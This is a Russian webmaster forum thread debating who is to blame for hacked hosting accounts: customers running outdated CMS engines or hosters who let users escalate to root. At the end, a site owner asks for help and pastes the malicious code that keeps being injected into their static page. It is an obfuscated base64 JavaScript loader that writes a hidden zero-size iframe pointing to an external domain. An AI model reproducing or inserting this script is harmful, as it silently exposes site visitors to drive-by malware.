- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Как удалить плохие SEO-ссылки и очистить ссылочную массу сайта
Применяем отклонение ссылок
Сервис Rookee
VK приобрела 70% в структуре компании-разработчика red_mad_robot
Которая участвовала в создании RuStore
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Клиенты виноваты, а не хостеры.
Если все перестанут ставить всякие joomla, mamba, WP и т.п. на хостинги, а тем более левые модули с загрузкой файлов, то и взломы станут редкостью.
У всех этих движков одна проблема: предлагается установка прав на запись на очень многие директории, которые не защены "умными" разрабами от загрузки в них и запуска скриптов. И поэтому для хакеров не составляет труда загрузить шел в такую директорию, через него загрузить еще кучу гадости, а дальше при особом желании угнать рут от сервера.
Т.е. по вашему можно взломать 99% хостеров?
Я ещё ни одного не знаю хостера, у кого нет Joomla или WP.
Даже могу сказать, что почти у каждого крупного хостера есть взломанные аккаунты юзеров. И что-то целиком сервера у них не взломаны.
А те, кто даёт ssh, тот уже потенциально взломаный? Т.к. нафиг не нужно никаких шелов загружать, покупаете хостинг и у вас уже есть полноценный шелл)
Главное: Никакие взломы юзерских аккаунтов не должны влиять на стабильность работы сервера. тем более, никакой возможности получения привилегий рута. При таком подходе вообще не нужно будет ломать сайты, проще заказать у этого же хостера аккаунт и получить рута)
вот это вот дальше не должно случаться на хостинге где регулярно обновляют ядро или отключен запуск программ в разделе с пользовательскими данными.
В чем, собственно, и суть темы.
Не думаю, что хостеры регулярно что-то обновляют, накручивая сайтам даунтайм, тем более ядро.
Запуск программ в большинстве случаев включается одной строчкой в .htaccess: Options +ExecCGI. Да и эта опция не нужна, шелы написаны на php.
А против криворуких скриптов защиты не существует, не взломают, так положат сервер или еще что придумают. Из простого: открыли аккаунт, разослали спам, пришли кучи абуз; опять открыли, разослали, дата-центр выдал последнее предупреждение; потом открыли, разослали, дата-центр отключил сервер без возможности включения.
seolancer добавил 25.01.2010 в 18:03
Т.е. по вашему можно взломать 99% хостеров?
Я ещё ни одного не знаю хостера, у кого нет Joomla или WP.
Даже могу сказать, что почти у каждого крупного хостера есть взломанные аккаунты юзеров. И что-то целиком сервера у них не взломаны.
А те, кто даёт ssh, тот уже потенциально взломаный? Т.к. нафиг не нужно никаких шелов загружать, покупаете хостинг и у вас уже есть полноценный шелл)
Главное: Никакие взломы юзерских аккаунтов не должны влиять на стабильность работы сервера. тем более, никакой возможности получения привилегий рута. При таком подходе вообще не нужно будет ломать сайты, проще заказать у этого же хостера аккаунт и получить рута)
Потенциально, все 100% взломать можно.
Соласен. Ломается всё, но ни джумла, ни ещё что-то тут не причём.
То, что сделал человек, им же и ломается. Вопрос только в цене и времени.
Клиенты клиентами, клиенты всегда будут виноваты, но это не даёт повода чесать пузо хостерам и писать "проблемы ваши". Хостерам тоже нужно шевелится.
Соласен. Ломается всё, но ни джумла, ни ещё что-то тут не причём.
Не поверите, но эти движки ломаются автоматом через известные уязвимости. Мало кто из клиентов следит за обновлениями. Стоит какой-нибудь движок допной версии, который весь в дырах.
Ну, даже если не взломали сервер до рута, так через эти дыры все, что угодно заливают на сайт, и фишинг, и спам, и вирусы, а дата-центр это все постепенно напрягает, и тот начинает медленней реагировать на абузы или предлагает съехать.
Раньше в сфере хостинга работал, насмотрелся на все это на всю жизнь. И на неадекват клиентов тоже.
Не поверите, но эти движки ломаются автоматом через известные уязвимости. Мало кто из клиентов следит за обновлениями. Стоит какой-нибудь движок допной версии, который весь в дырах.
Ну, даже если не взломали сервер до рута, так через эти дыры все, что угодно заливают на сайт, и фишинг, и спам, и вирусы, а дата-центр это все постепенно напрягает, и тот начинает медленней реагировать на абузы или предлагает съехать.
Раньше в сфере хостинга работал, насмотрелся на все это на всю жизнь. И на неадекват клиентов тоже.
Расставаться просто нужно с такими клиентами.
Я просто работал с крупными хостерами, где постоянно что-то и где-то "вылазит". Но таких глобальных проблем ни разу не было.
ЗЫ.Надеюсь они закрываться не надумали, и все эти аномали - результат стремления заработать последнюю копеечку :)
Не закроются, абузоустойчивые хостинги востребованы.
Не поверите, но эти движки ломаются автоматом через известные уязвимости. Мало кто из клиентов следит за обновлениями. Стоит какой-нибудь движок допной версии, который весь в дырах.
Ну, даже если не взломали сервер до рута, так через эти дыры все, что угодно заливают на сайт, и фишинг, и спам, и вирусы, а дата-центр это все постепенно напрягает, и тот начинает медленней реагировать на абузы или предлагает съехать.
Раньше в сфере хостинга работал, насмотрелся на все это на всю жизнь. И на неадекват клиентов тоже.
Какая чушь. Зачем ломать чужой сайт, если ты знаешь, что у хостера руки из жопы растут? Пришёл, зарегистрировал себе аккаунт на левое имя, и ВСЁ, получай рута нахаляву со своего акка, не надо чужие сайты ломать.
Это хостер должен заботиться о том, чтобы из обычного аккаунта нельзя было получить рута.
Сайт полностью на html, без скриптов и т.д. Не первый раз в конце страницы появляется данный код. Меняли абсолютно все пароли, толку ноль.
<script>function q120955d13(p2){var u2='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var w3='';var ob,x9,w1,w5,y3,vd,te;var r0=0;do{w5=u2.indexOf(p2.charAt(r0++));y3=u2.indexOf(p2.charAt(r0++));vd=u2.indexOf(p2.charAt(r0++));te=u2.indexOf(p2.charAt(r0++));ob=(w5<<2)|(y3>>4);x9=((y3&15)<<4)|(vd>>2);w1=((vd&3)<<6)|te;if(ob>=192)ob+=848;else if(ob==168)ob=1025;else if(ob==184)ob=1105;w3+=String.fromCharCode(ob);if(vd!=64){if(x9>=192)x9+=848;else if(x9==168)x9=1025;else if(x9==184)x9=1105;w3+=String.fromCharCode(x9);}if(te!=64){if(w1>=192)w1+=848;else if(w1==168)w1=1025;else if(w1==184)w1=1105;w3+=String.fromCharCode(w1);}}while(r0<p2.length);document.write(w3);};q120955d13('PGlmcmFtZSBzcmM9Imh0dHA6Ly9jeWJlci1mb3guY29tLzY2Ni9pbmRleC5waHAiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT4A');</script>
Код с форума потрите...